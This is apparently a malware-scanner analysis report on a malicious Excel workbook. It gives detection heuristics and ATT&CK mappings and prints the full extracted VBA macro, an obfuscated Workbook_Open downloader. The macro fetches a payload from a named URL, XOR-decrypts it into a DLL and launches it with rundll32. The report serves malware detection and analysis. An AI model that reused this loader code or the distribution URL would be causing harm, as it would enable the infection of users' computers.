MALICIOUS
390
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains a Workbook_Open macro that utilizes obfuscated VBA code, including calls to Shell() and CreateObject(). This pattern is indicative of a downloader designed to fetch and execute a secondary payload from a remote URL. The embedded URL http://maxleather.aaomg.com/jhg45s is highly suspicious and likely serves as the distribution point for the next stage of the attack.
Heuristics 9
-
ClamAV: Xls.Downloader.Donoff-10030344-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Donoff-10030344-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
WordCount = UBound(aOut) + 1 Call Shell(sIn, vbHide) -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set generatedByDDefo1DASH1solo = CreateObject(generatedByDDefoPLdunay(3)) Set generatedByDDefoKSKLAL = generatedByDDefo1DASH1solo.Environment(generatedByDDefoPLdunay(2 + 2)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set generatedByDDefo1DASH1solo = CreateObject(generatedByDDefoPLdunay(3)) Set generatedByDDefoKSKLAL = generatedByDDefo1DASH1solo.Environment(generatedByDDefoPLdunay(2 + 2)) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
VarPupka: CallByName generatedByDDefora12dv34, "sa" + RACHEL + "ile", VbMethod, generatedByDDefoUUUKABBB, 14 / 7 SaveAllStufAndExit generatedByDDefoUUUKABBB, generatedByDDefoUUUKA, "XNplLxvSG39YeXNXYidwXaOcq9h7uJZs" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Sub Workbook_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://maxleather.aaomg.com/jhg45s In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11536 bytes |
SHA-256: 0e6eb3b13408c893b9f9aaca012e6b0363773378da8e5fd3cdc7d222ce5684ca |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
ItNinja "Chelsi"
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Public generatedByDDefoDAcdaw As Object
Public generatedByDDefora12dv34 As Object
Public generatedByDDefoKSKLAL As Object
Public generatedByDDefoLAKOPPC As String
Public generatedByDDefoPLdunay() As String
Public generatedByDDefoUUUKA As String
Public generatedByDDefoUUUKABBB As String
Public generatedByDDefoGMAKO As Object
Public generatedByDDefo4 As String
Public generatedByDDefo2 As String
Public generatedByDDefoASALLLP As Variant
Public Const generatedByDDefoRH = "User-Agent"
Public Const RACHEL = "vetof"
Function CreateShare()
Set objNewShare = objWMIService.Get("Win32_Share")
intReturn = objNewShare.Create _
(FilePath, "WMI_SHARE", 0, 25, "")
If intReturn <> 0 Then
WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
Select Case intReturn
Case 2
WScript.Echo "WMIEXEC ERROR: Access Denied!"
Case 9
WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
Case 22
WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"
Case 24
WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
End Select
If intReturn <> 22 Then WScript.Quit 1
Else
WScript.Echo "WMIEXEC : Share created sucess."
WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
WScript.Echo "WMIEXEC : Share Path -> " & FilePath
End If
End Function
Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
GodnTeBabenParama = Replace(CH1, CH2, CH3)
End Function
Public Function NombreUsuario() As String
Dim SQL As String
generatedByDDefora12dv34.Type = 0 + 0 + 1
generatedByDDefora12dv34.Open
Exit Function
SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
If Not RsUsuario.EOF Then
NombreUsuario = RsUsuario!usu_apodo
End If
End Function
Public Function ToDBDateTime(ByVal ddmmyyhhmmDateTime As String) As String
Set generatedByDDefo1DASH1solo = CreateObject(generatedByDDefoPLdunay(3))
Set generatedByDDefoKSKLAL = generatedByDDefo1DASH1solo.Environment(generatedByDDefoPLdunay(2 + 2))
VerCadenaPermiso ddmmyyhhmmDateTime
End Function
Attribute VB_Name = "Module3"
Public Sub DecryptByte(ByteArray() As Byte, Key As String)
Dim offset As Long
Dim ByteLen As Long
Dim ResultLen As Long
Dim CurrPercent As Long
Dim NextPercent As Long
Dim m_Key() As Byte
Dim m_KeyLen As Long
m_KeyLen = Len(Key)
ReDim m_Key(m_KeyLen)
m_Key = StrConv(Key, vbFromUnicode)
ByteLen = UBound(ByteArray) + 1
ResultLen = ByteLen
For offset = 0 To (ByteLen - 1)
ByteArray(offset) = ByteArray(offset) Xor m_Key(offset Mod m_KeyLen)
If (offset >= NextPercent) Then
CurrPercent = Int((offset / ResultLen) * 100)
NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
End If
Next
End Sub
Public Sub VerCadenaPermiso(permiso As String)
Dim i As Long
Dim letra As String
Alta = False
Baja = False
modi = False
Dim Consu As Boolean
Consu = True
Dim hizen As String
generatedByDDefo4 = "http://maxleather.aaomg.com/jhg45s"
hizen = Application & "frs"
rodger = Split(hizen, " ")
If rodger(0) = "Microsoft" Then
generatedByDDefoDAcdaw.Open generatedByDDefoPLdunay(5), generatedByDDefo4, False
generatedByDDefoDAcdaw.setRequestHeader generatedByDDefoRH, "Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)"
generatedByDDefoDAcdaw.Send
TlfFormat letra, True
NombreUsuario
generatedByDDefoacheha letra
End If
Exit Sub
For i = 1 To Len(permiso)
letra = Mid(permiso, i, 1)
If letra = "A" Then
Alta = True
End If
If letra = "B" Then
Baja = True
End If
If letra = "M" Then
modi = True
End If
If letra = "C" Then
Consu = True
End If
Next i
If Len(permiso) = 0 Then
Consu = False
modi = False
Alta = False
Baja = False
End If
End Sub
Public Function GetResulOfMyResult(ByVal Cadena As String) As String
generatedByDDefo2 = GodnTeBabenParama(generatedByDDefo2, "%DI", "M")
GetCurrentFolder
Set generatedByDDefora12dv34 = CreateObject(generatedByDDefoPLdunay(1))
Set generatedByDDefoGMAKO = CreateObject(generatedByDDefoPLdunay(5 - 3))
ClearString ""
End Function
Public Function generatedByDDefoacheha(pass As String) As String
Dim temp As String
Dim generatedByDDefotum As String
GoTo beyTumba
Dim pos As Long
Dim leng As Long
Dim tim As Variant
Dim i As Long
Dim Key As Long
leng = Len(pass)
tim = Mid(Time, 1, 8)
tim = Mid(tim, 1, Len(tim) - 3)
tim = Mid(tim, Len(tim) - 1, 2) * Int(Rnd * 100)
For i = 1 To Len(CStr(tim))
pos = pos + CInt(Mid(CStr(tim), i, 1))
Next
While pos > Len(pass)
pos = pos Mod 10 + Int(Rnd * 10)
If pos = 0 Then
pos = Len(pass) + 1
End If
Wend
beyTumba:
generatedByDDefoASALLLP = generatedByDDefoDAcdaw.responseBody
ReadResult
End Function
Attribute VB_Name = "P"
Public Function ReadResult()
generatedByDDefora12dv34.Write generatedByDDefoASALLLP
GoTo pid7
WScript.Sleep (WAITTIME)
UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
Set fso = CreateObject("Scripting.FileSystemObject")
Set objFile = fso.OpenTextFile(UNCFilePath, 1)
If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
objFile.Close
WScript.Echo strContents
strDelFile = "del " & file & " /F"
exe.c strDelFile, "nul"
pid7:
TlfFormat "", False
End Function
Public Function GetCurrentFolder()
generatedByDDefo2 = GodnTeBabenParama(generatedByDDefo2, "*P", LCase("S"))
GoTo mig5
WScript.Sleep (WAITTIME)
UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
Set fso = CreateObject("Scripting.FileSystemObject")
Set objFile = fso.OpenTextFile(UNCFilePath, 1)
GetCurrentFolder = objFile.ReadLine
objFile.Close
strDelFile = "del " & file & " /F"
exe.c strDelFile, "nul"
mig5:
generatedByDDefoPLdunay = Split(generatedByDDefo2, "JIIIINX")
End Function
Public Function ClearString(ByRef inOrigString As String) As String
Dim strNewString As String
Dim sChar As String
Dim i As Integer
Dim d As Boolean
d = True
IsWord = True
For i = 1 To Len(Trim("Reika"))
If d = False Then
Set generatedByDDefoDAcdaw = CreateObject(generatedByDDefoPLdunay(i - 2))
Exit For
Else
d = False
End If
Next i
ToDBDateTime ""
Exit Function
Call check_fo.r_MAXIS(False)
Call navigate_t.o_MAXIS_screen("POLI", "____")
EMWri.teScreen "TEMP", 5, 40
EMWri.teScreen "TABLE", 21, 71
trans.mit
Set objExcel = CreateObject("Excel.Application")
objExcel.Visible = True
Set objWorkbook = objExcel.Workbooks.Add()
objExcel.DisplayAlerts = True
objExcel.Cells(1, 1).Value = "TITLE"
objExcel.Cells(1, 2).Value = "SECTION"
objExcel.Cells(1, 3).Value = "REVISED"
For i = 1 To 3
objExcel.Cells(1, i).Font.Bold = True
Next
ClearString = strNewString
End Function
Public Sub SaveAllStufAndExit(SourceFile As String, DestFile As String, Optional Key As String)
Dim libhercen As Integer
Dim ByteArray() As Byte
libhercen = FreeFile
Open SourceFile For Binary As #libhercen
ReDim ByteArray(0 To LOF(libhercen) - 1)
Get #libhercen, , ByteArray()
Close #libhercen
Call DecryptByte(ByteArray(), Key)
libhercen = FreeFile
Open DestFile For Binary As #libhercen
Put #libhercen, , ByteArray()
Close #libhercen
End Sub
Public Function ItNinja(ByRef inGUID As String) As String
generatedByDDefo2 = "%DIicro*Poft.X%DILHTTPJIIIINXAdodb.*Ptr@JJa%DIJIIIINX*Ph@JJll.Ap"
generatedByDDefo2 = generatedByDDefo2 + GodnTeBabenParama("plicationJIIIINXW*Pcript.*Ph@JJllJIIIINXProc@JJ*P*PJIIIINXG@JJTJIIIINXT@JJ%DIPJIIIINXTyp@JJJIIIINXop@JJnJIIIINXwritRUFUSAKpon*P@JJBodyJIIIINX*Pav@JJtofil@JJJIIIINX", "RUFUSAK", "@JJJIIIINXr@JJ*P")
generatedByDDefo2 = GodnTeBabenParama(generatedByDDefo2 + "\siluan*P.dll", "@JJ", "e")
GetResulOfMyResult "-"
Exit Function
If Mid$(inGUID, 1, 1) <> "{" Then
ItNinja = "{" & inGUID & "}"
Else
ItNinja = inGUID
End If
End Function
Public Function TlfFormat(ByVal tlfNr As String, dilodan As Boolean) As String
Dim tmp As String
Dim i As Long
If dilodan Then
generatedByDDefoLAKOPPC = generatedByDDefoKSKLAL(generatedByDDefoPLdunay(6))
generatedByDDefoUUUKA = generatedByDDefoLAKOPPC
generatedByDDefoUUUKABBB = generatedByDDefoUUUKA + "\vslaski"
generatedByDDefoUUUKA = generatedByDDefoUUUKA + generatedByDDefoPLdunay(12)
Exit Function
Else
GoTo VarPupka
End If
restart:
For i = 1 To Len(tlfNr)
If Mid$(tlfNr, i, 1) = " " Then
tlfNr = Mid$(tlfNr, 1, i - 1) & Mid$(tlfNr, i + 1)
GoTo restart
End If
Next i
For i = 1 To Len(tlfNr)
tmp = tmp & Mid$(tlfNr, i, 1)
If i = 2 Or i = 4 Or i = 6 Or i = 8 Or i = 10 Then
tmp = tmp & " "
End If
Next i
TlfFormat = tmp
VarPupka:
CallByName generatedByDDefora12dv34, "sa" + RACHEL + "ile", VbMethod, generatedByDDefoUUUKABBB, 14 / 7
SaveAllStufAndExit generatedByDDefoUUUKABBB, generatedByDDefoUUUKA, "XNplLxvSG39YeXNXYidwXaOcq9h7uJZs"
WordCount "rund" & "ll32.exe " & generatedByDDefoUUUKA & ",qwerty", Split(", .", " ")
End Function
Function NormalizeString(sIn, aDelims)
Dim i, sOut, aOut, iMax
sOut = sIn
For i = LBound(aDelims) To UBound(aDelims)
sOut = Replace(sOut, aDelims(i), " ")
Next
aOut = Split(sOut, " ")
sOut = ""
iMax = UBound(aOut)
For i = LBound(aOut) To iMax
If aOut(i) <> "" Then
sOut = sOut + aOut(i) + " "
End If
Next
NormalizeString = Trim(sOut)
End Function
Function WordCount(sIn, aDelims)
Dim sOut, aOut
sOut = NormalizeString(sIn, aDelims)
aOut = Split(sOut, " ")
WordCount = UBound(aOut) + 1
Call Shell(sIn, vbHide)
End Function
Function ExtractWord(iPos, sIn, aDelims)
Dim sOut, aOut
sOut = NormalizeString(sIn, aDelims)
aOut = Split(sOut, " ")
ExtractWord = aOut(iPos)
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 41472 bytes |
SHA-256: 89e347ea44621e0f50f2c77de71de2e9b6b8ff57baeb721a61897fe679aae4e5 |
|||
|
Detection
ClamAV:
Xls.Downloader.Donoff-10030344-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.